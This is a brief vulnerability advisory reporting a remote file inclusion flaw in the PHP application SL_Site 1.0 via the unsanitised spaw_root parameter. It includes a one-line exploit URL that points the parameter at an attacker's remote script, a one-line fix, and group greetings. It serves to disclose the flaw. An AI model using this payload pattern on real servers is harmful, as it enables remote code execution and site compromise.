SL_Site <= 1.0 [spaw_root] Remote File Include Vulnerability

------------------------------------------------------------------------
---

SL_Site <= 1.0 [spaw_root] Remote File Include Vulnerability

------------------------------------------------------------------------
---

Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net :

Remote : Yes

Critical Level : Dangerous

------------------------------------------------------------------------
---

Affected software description :

~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : SL_Site

version : 1.0

URL : ftp://ftp1.comscripts.com/PHP/2032_slsite-10.zip

------------------------------------------------------------------

Exploit:

~~~~~~

Variable $spaw_root not sanitized.When register_globals=on an attacker ca

n exploit this vulnerability with a simple php injection script.

# http://site.com/[path]/admin/editeur/spaw_control.class.php?spaw_root=[E
vil_Script]

------------------------------------------------------------------------
---

Solution :

~~~~~~~~

declare variabel $spaw_root

------------------------------------------------------------------------
---

Shoutz:

~~~~

# Special greetz to my good friend [Oo]

# To all members of #h4cky0u and RST [ hTTp://RST-CREW.net ]

------------------------------------------------------------------------
---

*/

Contact:

~~~~~~

Nick: Kw3rLn

E-mail: ciriboflacs[at]YaHoo[dot]Com

Homepage: hTTp://RST-CREW.NET

_/*

-------------------------------- [ EOF] ----------------------------------